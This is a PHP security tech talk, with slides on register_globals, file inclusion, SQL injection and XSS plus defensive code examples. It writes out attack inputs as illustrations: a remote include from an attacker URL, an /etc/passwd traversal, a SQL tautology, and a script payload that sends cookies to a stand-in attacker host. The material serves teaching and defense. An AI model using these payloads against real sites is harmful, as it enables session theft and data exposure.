Php security

PHP Security Tech Talk

2. Agenda
  • Importance of PHP Security
  • Concerns of PHP Security
    - Input Validation
    - Register Globals
    - Code Injection
    - SQL Injection
    - Cross-site Scripting (XSS)
3. Importance of PHP Security
  • Protect the server from crashing
  • Prevent a malicious user from gaining root access
  • Protect customer data
4. Input Validation
  • All user input is unreliable and cannot be trusted
  • Solution:
    - Validate every piece of user input before using it
    - Validation on the client side is good for the user (fast feedback)
    - Validation on the server side is good for security: client-side checks run in the attacker's browser and can be bypassed or removed, so they protect nothing
5. Register Globals
  • When register_globals is On, every GET, POST and cookie parameter becomes a global PHP variable, so any variable the script did not initialize can be set by the client
  • Example:

    <?php
    if (authenticate_user()) {
        $authenticated = true;
    }
    // ...
    if (!$authenticated) {
        die("Authentication required");
    }
    ?>

  • Requesting http://ffs.com/admin.php?authenticated=1 pre-sets $authenticated to 1 when authenticate_user() fails, so the check passes and the page is served
  • The code is only safe if $authenticated is initialized to false before the first if, regardless of the register_globals setting
6. Protecting against Register Globals
  • Set register_globals = Off in php.ini (Off by default since PHP 4.2.0; deprecated in 5.3.0 and removed in 5.4.0)
  • Initialize every variable before use, so a request parameter can never supply its first value
  • Alternative to register_globals: the superglobal arrays, which make the source of a value explicit
    - $_GET – query-string parameters
    - $_POST – request body fields
    - $_COOKIE – cookies sent by the client
    - $_FILES – uploaded file data
    - $_SERVER – server and request data (HTTP_* headers, REQUEST_URI and similar entries are client-controlled and need the same validation as any other input)
    - $_ENV – environment variables
    - $_REQUEST – merge of GET, POST and COOKIE; avoid it where the source of a value matters, because depending on request_order a value from one source can shadow another
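The two slides above say to validate on the server and to read input from the superglobals rather than from variables a request may have created. The following is an added example, not code from the original talk, showing what that looks like in PHP 7 or later: every variable is initialized, input is read explicitly from an array standing in for $_GET, and each field is checked with filter_var() or an allowlist. The parameter names (id, sort, email) and the function name are assumptions made for the demo.

```php
<?php
// Added example (not from the original slides): server-side validation of
// request parameters read explicitly from a superglobal. Written for PHP 7+.
// Assumed hypothetical parameters: ?id=<int>&sort=<name|date>&email=<addr>
declare(strict_types=1);

function validateRequest(array $get): array
{
    // Always initialize: never rely on a variable that user input may have
    // created (the register_globals problem) or that may simply be missing.
    $errors = [];
    $clean  = ['id' => null, 'sort' => 'name', 'email' => null];

    // Integer in a fixed range. FILTER_VALIDATE_INT rejects "1abc", "1 OR 1=1",
    // "0x1" and floats; min_range keeps out 0 and negatives.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => PHP_INT_MAX]]);
    if ($id === false) {
        $errors[] = 'id must be a positive integer';
    } else {
        $clean['id'] = $id;
    }

    // Enumerated value: compare against an allowlist (strict), never a denylist.
    $sort = $get['sort'] ?? 'name';
    if (!in_array($sort, ['name', 'date'], true)) {
        $errors[] = 'sort must be one of: name, date';
    } else {
        $clean['sort'] = $sort;
    }

    // Optional field: validate only if present, and bound its length.
    if (isset($get['email'])) {
        $email = filter_var($get['email'], FILTER_VALIDATE_EMAIL);
        if ($email === false || strlen($email) > 254) {
            $errors[] = 'email is not a valid address';
        } else {
            $clean['email'] = $email;
        }
    }

    return ['ok' => $errors === [], 'values' => $clean, 'errors' => $errors];
}

// Constructed sample requests, standing in for $_GET.
$samples = [
    ['id' => '42', 'sort' => 'date', 'email' => 'alice@example.com'],  // valid
    ['id' => '1 OR 1=1', 'sort' => 'name'],                              // bad id
    ['id' => '7', 'sort' => 'price', 'email' => 'not-an-address'],      // bad sort, bad email
    ['authenticated' => '1'],                                            // unexpected key is ignored; id missing
];

foreach ($samples as $i => $get) {
    $result = validateRequest($get);
    printf("request %d: %s\n", $i,
        $result['ok'] ? 'accepted' : 'rejected (' . implode('; ', $result['errors']) . ')');
}
```

In a real handler the call is validateRequest($_GET) and the script stops with a 400 response when 'ok' is false; only the values in 'values' are used afterwards. Unknown keys such as authenticated are never copied out, which is the behavioural opposite of register_globals.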
7. Code Injection (file inclusion)
  • Dynamic paths or file names used in require/include statements
  • Example:

    <?php
    include "{$_GET['path']}/script.php";
    ?>

  • If path is set to http://www.hackers.com via GET, the statement becomes

    <?php
    include "http://www.hackers.com/script.php";
    ?>

    and the attacker's PHP code runs on the server
  • Remote URLs only work when allow_url_include is On (Off by default since PHP 5.2); a local traversal such as path=../../etc/passwd%00 or a previously uploaded file works even when it is Off
  • Avoid dynamic paths in include/require
  • Always use full paths defined by constants, or map the user's choice onto an allowlist of known files
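The slide's remedy is "full paths defined by constants". The block below is an added example, not code from the original talk, of two ways to do that for a page selector: an allowlist keyed by name, and, for the case where file names really must be dynamic, a realpath() confinement check. APP_ROOT, PAGE_DIR, the page names and the function names are assumptions made for the demo.

```php
<?php
// Added example (not from the original slides): replacing
//   include "{$_GET['path']}/script.php";
// with includes whose path the attacker cannot choose. APP_ROOT, PAGE_DIR,
// the page names and the function names are my own assumptions for the demo.
declare(strict_types=1);

define('APP_ROOT', __DIR__);              // full path, fixed by a constant
define('PAGE_DIR', APP_ROOT . '/pages');

// Option 1 (preferred): user input selects a key in an allowlist. The input is
// never part of the path, so ../, http:// and %00 tricks have nothing to act on.
function resolvePage(string $name): ?string
{
    $pages = [
        'home'    => PAGE_DIR . '/home.php',
        'about'   => PAGE_DIR . '/about.php',
        'contact' => PAGE_DIR . '/contact.php',
    ];
    return $pages[$name] ?? null;         // unknown key: nothing is included
}

// Option 2: when file names must be dynamic, canonicalise and confine them.
function resolveInsideDir(string $userFile): ?string
{
    if (strpos($userFile, "\0") !== false) {
        return null;                      // NUL bytes truncate paths in C-level APIs
    }
    $base = realpath(PAGE_DIR);
    $real = realpath(PAGE_DIR . '/' . basename($userFile) . '.php');
    if ($base === false || $real === false) {
        return null;                      // directory or file does not exist
    }
    // realpath() resolved symlinks and ../; the result must still sit under PAGE_DIR.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed inputs standing in for $_GET['page'].
foreach (['home', 'about', '../../etc/passwd', 'http://www.hackers.com', 'admin'] as $input) {
    printf("%-26s -> %s\n", $input, resolvePage($input) ?? 'rejected');
}

// Real use:
//   $file = resolvePage($_GET['page'] ?? 'home');
//   if ($file === null) { http_response_code(404); exit; }
//   include $file;
```

resolveInsideDir() returns null for everything when PAGE_DIR does not exist, so the demo loop only exercises the allowlist; the confinement check is there for code bases that cannot enumerate their pages up front. Even then, a string the attacker fully controls should never reach include without one of these two checks.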
8. SQL Injection
  • Lets an attacker run malicious SQL on the database server
  • Can let a malicious user gain administrative (root) access
  • Removal of data
  • Modification of existing values
  • Denial of service
9. Protecting against SQL Injection
  • Use prepared statements with bound parameters: mysqli::prepare() with mysqli_stmt::bind_param(), or PDO::prepare() with bound values
  • Validate input data before sending it to the database
  • Where a value cannot be bound, escape it with mysqli_real_escape_string() (the old mysql_real_escape_string() belongs to the mysql extension, deprecated in PHP 5.5 and removed in 7.0); addslashes() is not charset-aware and is not a substitute
  • magic_quotes_gpc – do not rely on it; it was deprecated in PHP 5.3 and removed in 5.4, and it never covered every quoting context
  • error_reporting – set to E_ALL
  • display_errors – On in development, Off in production (database error messages leak table and column names to the attacker)
  • log_errors – On in production
  • error_log – set to the desired location of the error log file
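To make the difference between the two slides above concrete, here is an added example, not code from the original talk, that runs the same lookup once by string concatenation and once as a prepared statement. It uses PDO with an in-memory SQLite database so it runs without a MySQL server; with MySQL the equivalent is mysqli::prepare() plus bind_param(), or PDO with a mysql: DSN. The table, the users and the payload are constructed for the demo.

```php
<?php
// Added example (not from the original slides): the same login lookup built
// by string concatenation and with a prepared statement. Uses PDO + SQLite
// in memory so it runs offline; table, rows and payload are constructed here.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$db->exec("INSERT INTO users (username, password_hash) VALUES ('alice', 'x'), ('admin', 'y')");

// Vulnerable: user input is spliced into the SQL text, so it can change the
// statement's structure, not just its data.
function findUserVulnerable(PDO $db, string $username): array
{
    $sql = "SELECT id, username FROM users WHERE username = '$username'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the SQL text is fixed at prepare time; the value travels
// separately as a parameter and is only ever compared as a string.
function findUserSafe(PDO $db, string $username): array
{
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = ?');
    $stmt->execute([$username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$payload = "' OR '1'='1";   // classic tautology: WHERE username = '' OR '1'='1'

$rows = findUserVulnerable($db, $payload);
printf("concatenated query returned %d row(s): every user leaked\n", count($rows));

$rows = findUserSafe($db, $payload);
printf("prepared statement returned %d row(s): payload treated as a literal username\n", count($rows));
```

With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is parsed by the server rather than interpolated by the client driver. Binding protects values only; table and column names or ORDER BY directions cannot be bound and must come from an allowlist in the application.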
10. Cross-site Scripting (XSS)
  • Inject HTML or script into a page served to other users, or make the victim's browser send a request to another site
  • Session take-over
  • Password theft
  • User tracking by third parties
  • Example payload, which sends the victim's cookies to the attacker's server:

    <script>document.location = "http://cookiehaker.com/xss.php?"+document.cookie</script>
11. Protecting against XSS
  • Server-side validation of all input data
  • Encode on output, in the context where the value lands (HTML text, attribute, JavaScript, URL), since each context needs different escaping
  • htmlspecialchars() – encodes &, <, >, " and, with ENT_QUOTES, ' (the single quote is only encoded by default from PHP 8.1)
  • htmlentities() – converts all applicable characters to HTML entities
  • strip_tags() – removes HTML and PHP tags; useful for cleaning input, but not a substitute for output encoding, because it does nothing for values placed inside attributes or scripts
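The slide lists the encoding functions; the following is an added example, not code from the original talk, that wraps them into small context-specific helpers and runs the slide's own payload through each. The helper names e_html, e_js and e_url are my own, not PHP built-ins, and the attribute-breakout string is constructed for the demo.

```php
<?php
// Added example (not from the original slides): context-aware output encoding.
// The helper names e_html, e_js and e_url are my own, not PHP built-ins.
declare(strict_types=1);

// HTML text content and double- or single-quoted attribute values.
function e_html(string $s): string
{
    // ENT_QUOTES also encodes the single quote, which htmlspecialchars() left
    // alone by default before PHP 8.1; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// A value embedded inside a <script> block as a JavaScript string literal.
function e_js(string $s): string
{
    // json_encode() yields a valid JS string literal; the HEX flags escape
    // < > & ' " so a "</script>" in the data cannot close the block early.
    $json = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE);
    return $json === false ? '""' : $json;   // invalid UTF-8: emit an empty literal
}

// A value placed in a URL query string.
function e_url(string $s): string
{
    return rawurlencode($s);
}

// Constructed attacker input: the payload from the slide plus an attribute breakout.
$payload = '<script>document.location = "http://cookiehaker.com/xss.php?"+document.cookie</script>';
$attr    = '" onmouseover="alert(1)';

echo "<p>Hello, " . e_html($payload) . "</p>\n";                 // shown as text, not executed
echo '<input value="' . e_html($attr) . "\">\n";                  // quote encoded, attribute intact
echo "<script>var name = " . e_js($payload) . ";</script>\n";     // a plain string inside JS
echo '<a href="/search?q=' . e_url($payload) . "\">search</a>\n"; // safe query parameter
```

Two limits worth knowing: none of these helpers makes a value safe inside an unquoted attribute or as a URL scheme (javascript: survives rawurlencode in an href), so quote every attribute and validate URL values against an allowlist of schemes before encoding them.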
12. Testing Tools
  • XSS Me – https://addons.mozilla.org/en-US/firefox/addon/7598/
  • Web Developer Tool
    - Firefox – https://addons.mozilla.org/en-US/firefox/addon/60/
    - IE – http://www.microsoft.com/downloads/details.aspx?FamilyID=E59C3964-672D-4511-BB3E-2D5E1DB91038
  • Firebug – https://addons.mozilla.org/en-US/firefox/addon/1843/
